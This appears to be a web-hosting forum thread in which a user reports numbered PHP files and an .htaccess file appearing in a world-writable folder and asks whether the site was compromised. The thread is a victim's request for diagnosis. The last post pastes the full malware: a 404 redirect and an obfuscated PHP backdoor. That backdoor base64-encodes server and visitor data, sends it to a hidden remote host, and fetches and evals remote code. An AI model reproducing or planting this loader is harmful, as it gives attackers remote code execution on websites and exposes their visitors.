unknown file in writable folder

S

seachen

Verified User
Joined
Feb 3, 2007
Messages
491
may i know how to solve this problem?

it seen like hacked injected.
 

Attachments

  • unknow.PNG
    unknow.PNG
    26.6 KB · Views: 165
sorry for my language problem.

inside the file manager, inside the folder (folder permission 777) there is some unknown files. It is generate by apache.

Is it hacked?
 
Click on "edit" for both those files. Copy/paste the contents and we'll tell you if you were compromised.
 
Both files are owned by Apache and have 777 permissions, so even if those files don't do anything malicious, you have security holes you need to patch.
 
GXX said:
Click on "edit" for both those files. Copy/paste the contents and we'll tell you if you were compromised.
Click to expand...

From .htaccess
Options -MultiViews
ErrorDocument 404 //wap/84804.php
Click to expand...

From ####.php (#### refer to number, there is lot of this kind files all named in number figure.php)
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ffeb1c04671c6b19d4fa033f685d214c") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
Click to expand...
 
You must log in or register to reply here.
Back
Top